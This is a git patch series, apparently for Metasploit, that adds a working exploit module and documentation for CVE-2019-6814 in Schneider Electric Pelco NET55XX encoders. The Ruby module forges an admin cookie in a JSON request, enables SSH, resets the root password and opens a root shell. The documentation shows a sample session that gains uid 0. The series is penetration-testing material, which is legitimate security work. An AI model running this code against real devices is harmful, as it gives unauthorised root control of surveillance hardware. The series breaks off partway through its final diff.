From 925d894f22cf6b5aefb4b8ff8da875941b87c66d Mon Sep 17 00:00:00 2001 From: vitorespf Date: Thu, 11 Jul 2019 14:10:37 -0400 Subject: [PATCH 01/30] Add files via upload --- .../schneider_electric_net55xx_encoder.rb | 188 ++++++++++++++++++ 1 file changed, 188 insertions(+) create mode 100644 modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb new file mode 100644 index 0000000000..24adddfcf1 --- /dev/null +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -0,0 +1,188 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/ssh/command_stream' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", + 'Description' => %q{ + This module exploits an inadequate access control vulnerability creating a malicious + json request to the webUI encoder, thus allowing the SSH service to be enabled , and + changing the root password. This module has been tested sucessfully on: NET5501, + NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + + + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Lucas Dinucci ', + 'Vitor Esperança ' + + ], + 'References' => + [ + ['CVE', '2019-6814'], + ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ "Universal", {} ] ], + 'Privileged' => true, + 'DisclosureDate' => "Jan 25 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(80), + OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), + OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), + OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) + ], self.class + ) + + register_advanced_options( + [ + OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]), + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + + def rhost + datastore['RHOST'] + end + + def rport + datastore['RPORT'] + end + + def new_password + datastore['NEW_PASSWORD'] + end + + + def check + xmlPayload = '
http://schemas.xmlsoap.org/ws/2005/04/discovery/Probeuuid:f3d577a3-431f-4450-ab45-b480042b9c74http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousurn:schemas-xmlsoap-org:ws:2005:04:discovery
dp0:NetworkVideoTransmitter' + connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) + udp_sock.put(xmlPayload) + resp = [] + resp << udp_sock.get(datastore['TIMEOUT']) + xmlResponse = resp.join(',') + disconnect_udp + + if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508" + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + def change_password + print_status("#{rhost}:80 - Attempt to change the root password...") + headers = {} + headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' + headers['Content-Type'] = 'application/json;charset=utf-8' + headers['Connection'] = 'keep-alive' + headers['Accept'] = 'application/json, text/plain, */*' + headers['Accept-Language'] = 'en-US,en;q=0.5' + headers['Accept-Encoding'] = 'gzip, deflate, br' + headers['Cache-Control'] = 'no-cache' + headers['Pragma'] = 'no-cache' + headers['Content-Lenght'] = '47' + headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214') + headers['User-Agent'] = datastore['USER_AGENT'] + + post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}" + login = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214'), + 'data' => post, + 'headers' => headers, + }, timeout=datastore['TIMEOUT']) + + if !login or login.code != 200 + fail_with(Failure::UnexpectedReply, "Failed to change root password") + end + print_good("#{rhost}:80 - Successfully changed the root password...") + end + + def do_login + print_status("#{rhost}:22 - Attempt to start a SSH connection...") + change_password + factory = ssh_socket_factory + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :port => 22, + :use_agent => false, + :config => true, + :password => new_password, + :proxy => factory, + :non_interactive => true, + :verify_host_key => :never + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, 'root', opts) + end + rescue Rex::ConnectionError + return nil + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:22 SSH - Disconnected during negotiation" + return nil + rescue ::Timeout::Error + print_error "#{rhost}:22 SSH - Timed out during negotiation" + return nil + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:22 SSH - Failed authentication" + return nil + rescue Net::SSH::Exception => e + print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" + return nil + end + + if ssh + conn = Net::SSH::CommandStream.new(ssh) + return conn + end + + return nil + end + + + def exploit + conn = do_login + if conn + print_good("#{rhost}:22 - Session established ") + handler(conn.lsock) + end + end +end From 10b402fd7b5d4becdca163f626dcb62e6a1515ab Mon Sep 17 00:00:00 2001 From: vitorespf Date: Mon, 15 Jul 2019 11:47:45 -0300 Subject: [PATCH 02/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 24adddfcf1..26c51adda0 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -56,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - Opt::RHOST(), Opt::RPORT(80), OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), From 38f17b40624b25a439b7495b1819f013a31bd3dc Mon Sep 17 00:00:00 2001 From: vitorespf Date: Mon, 15 Jul 2019 11:48:43 -0300 Subject: [PATCH 03/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 26c51adda0..110f1cb64b 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -56,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - Opt::RPORT(80), OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) From 07834d7355a8c0da8217d34626256d2390f08347 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Mon, 15 Jul 2019 12:00:24 -0300 Subject: [PATCH 04/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com> --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 110f1cb64b..11ec37fb97 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508" return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def change_password From 55cc66f8933989bab1d4d382300b8a53076dab5d Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 21:27:15 -0400 Subject: [PATCH 05/30] Update schneider_electric_net55xx_encoder.rb Breaking xmlPayload into multiple lines --- .../http/schneider_electric_net55xx_encoder.rb | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 11ec37fb97..717c4c5105 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -86,7 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote def check - xmlPayload = '
http://schemas.xmlsoap.org/ws/2005/04/discovery/Probeuuid:f3d577a3-431f-4450-ab45-b480042b9c74http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousurn:schemas-xmlsoap-org:ws:2005:04:discovery
dp0:NetworkVideoTransmitter' + xmlPayload = ''\ + ''\ + '
'\ + 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ + 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ + ''\ + 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ + ''\ + 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ + '
'\ + ''\ + ''\ + 'dp0:NetworkVideoTransmitter'\ + ''\ + ''\ + '' connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) udp_sock.put(xmlPayload) resp = [] From c3fbd636541461580f23fc3f8410f324fc6ab215 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 21:45:06 -0400 Subject: [PATCH 06/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 717c4c5105..93aade1da9 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -109,8 +109,8 @@ class MetasploitModule < Msf::Exploit::Remote xmlResponse = resp.join(',') disconnect_udp - if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508" - return Exploit::CheckCode::Appears + if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end From 4ee745e21edfd9699d04c8acec69fbfedd3b2020 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 21:52:28 -0400 Subject: [PATCH 07/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 12 +----------- 1 file changed, 1 insertion(+), 11 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 93aade1da9..83a2f52919 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -120,20 +120,10 @@ class MetasploitModule < Msf::Exploit::Remote headers = {} headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' headers['Content-Type'] = 'application/json;charset=utf-8' - headers['Connection'] = 'keep-alive' - headers['Accept'] = 'application/json, text/plain, */*' - headers['Accept-Language'] = 'en-US,en;q=0.5' - headers['Accept-Encoding'] = 'gzip, deflate, br' - headers['Cache-Control'] = 'no-cache' - headers['Pragma'] = 'no-cache' - headers['Content-Lenght'] = '47' - headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214') - headers['User-Agent'] = datastore['USER_AGENT'] - post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}" login = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214'), + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), 'data' => post, 'headers' => headers, }, timeout=datastore['TIMEOUT']) From 6897d2ce17d4cbeb1629f1ed1e69a0bc03408f2b Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 22:03:46 -0400 Subject: [PATCH 08/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 83a2f52919..479c3cfb60 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -128,9 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote 'headers' => headers, }, timeout=datastore['TIMEOUT']) - if !login or login.code != 200 - fail_with(Failure::UnexpectedReply, "Failed to change root password") - end + fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") end From 6f21abfe08bde97fbf2223f390b1e288c5da5721 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 22:16:34 -0400 Subject: [PATCH 09/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 479c3cfb60..e92d73078d 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'net/ssh/command_stream' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -36,10 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2019-6814'], ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread' - }, 'Payload' => { 'Compat' => { @@ -56,7 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('USER_AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) ], self.class From 20e79e08dc602ce33197f3473fc4c75ed89e392b Mon Sep 17 00:00:00 2001 From: vitorespf Date: Tue, 16 Jul 2019 22:26:18 -0400 Subject: [PATCH 10/30] Update schneider_electric_net55xx_encoder.rb --- .../schneider_electric_net55xx_encoder.rb | 22 +++---------------- 1 file changed, 3 insertions(+), 19 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index e92d73078d..a0234b2175 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -63,21 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote ] ) end - - - def rhost - datastore['RHOST'] - end - - def rport - datastore['RPORT'] - end - + def new_password datastore['NEW_PASSWORD'] end - - + def check xmlPayload = ''\ ''\ @@ -101,7 +91,6 @@ class MetasploitModule < Msf::Exploit::Remote resp << udp_sock.get(datastore['TIMEOUT']) xmlResponse = resp.join(',') disconnect_udp - if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") return Exploit::CheckCode::Appears end @@ -139,13 +128,11 @@ class MetasploitModule < Msf::Exploit::Remote :non_interactive => true, :verify_host_key => :never } - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] - begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do - ssh = Net::SSH.start(rhost, 'root', opts) + ssh = Net::SSH.start(datastore['RHOST'], 'root', opts) end rescue Rex::ConnectionError return nil @@ -162,16 +149,13 @@ class MetasploitModule < Msf::Exploit::Remote print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" return nil end - if ssh conn = Net::SSH::CommandStream.new(ssh) return conn end - return nil end - def exploit conn = do_login if conn From 7a552369dfcdd7d0a5a05086f22260d700da3e02 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Thu, 18 Jul 2019 10:40:31 -0300 Subject: [PATCH 11/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index a0234b2175..1b792389c2 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -19,8 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote json request to the webUI encoder, thus allowing the SSH service to be enabled , and changing the root password. This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. - - }, 'License' => MSF_LICENSE, 'Author' => @@ -115,8 +113,8 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login - print_status("#{rhost}:22 - Attempt to start a SSH connection...") change_password + print_status("#{rhost}:22 - Attempt to start a SSH connection...") factory = ssh_socket_factory opts = { :auth_methods => ['password', 'keyboard-interactive'], @@ -135,25 +133,19 @@ class MetasploitModule < Msf::Exploit::Remote ssh = Net::SSH.start(datastore['RHOST'], 'root', opts) end rescue Rex::ConnectionError - return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:22 SSH - Disconnected during negotiation" - return nil rescue ::Timeout::Error print_error "#{rhost}:22 SSH - Timed out during negotiation" - return nil rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:22 SSH - Failed authentication" - return nil rescue Net::SSH::Exception => e print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" - return nil end if ssh conn = Net::SSH::CommandStream.new(ssh) return conn end - return nil end def exploit From 6f656e51c43b4803c23dbe549c12a20e39f4ef16 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:21:21 -0300 Subject: [PATCH 12/30] Add files via upload --- .../schneider_electric_net55xx_encoder.md | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md new file mode 100644 index 0000000000..8ea454916c --- /dev/null +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -0,0 +1,48 @@ +## Vulnerable Application + +Schneider Eletric Pelco NET55XX Encoder (CVE 2019-6814) + +Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). + This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password. + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `use use exploit/linux/http/schneider_eletric_net55xx_encoder` +- [ ] `set RHOSTS [rhosts]` +- [ ] `set RPORT [rport]` +- [ ] `set NEW_PASSWORD [new password]` +- [ ] `exploit` +- [ ] Verify you get a root shell + +## Options + +This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go. + +**NEW_PASSWORD** + +You should set a new ssh password to the vulnerable device. + + +## Scenarios + +**Schneider Electric Pelco Encoder NET5501-XT** + +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 +RHOSTS => 192.168.34.2 +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 +RPORT => 80 +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 +NEW_PASSWORD => msfrapid7 +msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run + +[] 192.168.34.2:22 - Attempt to start a SSH connection... +[] 192.168.34.2:80 - Attempt to change the root password... +[+] 192.168.34.2:80 - Successfully changed the root password... +[+] 192.168.34.2:22 - Session established +[] Found shell. +[] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400 + +uname -a;id +Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown +uid=0(root) gid=0(root) groups=0(root) \ No newline at end of file From 5f3f6f5b3f106a953fe0ffcb8929bc8e9841d2f6 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:54:34 -0300 Subject: [PATCH 13/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 8ea454916c..dc1d97a461 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -1,6 +1,6 @@ ## Vulnerable Application -Schneider Eletric Pelco NET55XX Encoder (CVE 2019-6814) +Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814) Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password. @@ -45,4 +45,4 @@ msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run uname -a;id Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown -uid=0(root) gid=0(root) groups=0(root) \ No newline at end of file +uid=0(root) gid=0(root) groups=0(root) From 4a2388cad7a951548c5e31ec219f6d9f0aba1c75 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:54:49 -0300 Subject: [PATCH 14/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index dc1d97a461..f2268675c5 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -8,7 +8,7 @@ Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET55 ## Verification Steps - [ ] Start `msfconsole` -- [ ] `use use exploit/linux/http/schneider_eletric_net55xx_encoder` +- [ ] `use use exploit/linux/http/schneider_electric_net55xx_encoder` - [ ] `set RHOSTS [rhosts]` - [ ] `set RPORT [rport]` - [ ] `set NEW_PASSWORD [new password]` From ea3932e31b888f90b17f6bf2fe63eb73a424467e Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:55:19 -0300 Subject: [PATCH 15/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 1b792389c2..94533326ac 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote xmlResponse = resp.join(',') disconnect_udp if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end From be791e551c6df5d4dd4fa83fdecd564d8faaf07b Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:56:33 -0300 Subject: [PATCH 16/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index f2268675c5..394007e601 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -3,7 +3,7 @@ Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814) Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). - This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password. + This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password. ## Verification Steps From 460e83eb81c2866eab9ded79568ee73f1404212e Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 09:56:51 -0300 Subject: [PATCH 17/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 394007e601..8507a2db4d 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -21,7 +21,7 @@ This module can be as simple as setting the RHOST and NEW_PASSWORD option, and y **NEW_PASSWORD** -You should set a new ssh password to the vulnerable device. +You should set a new SSH password to the vulnerable device. ## Scenarios From 5732880db6cd48a143340d186b4d5ba9cc9856b9 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 10:08:33 -0300 Subject: [PATCH 18/30] Update documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md Co-Authored-By: bcoles --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 8507a2db4d..53fb4bd7dc 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -17,7 +17,7 @@ Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET55 ## Options -This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go. +This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready 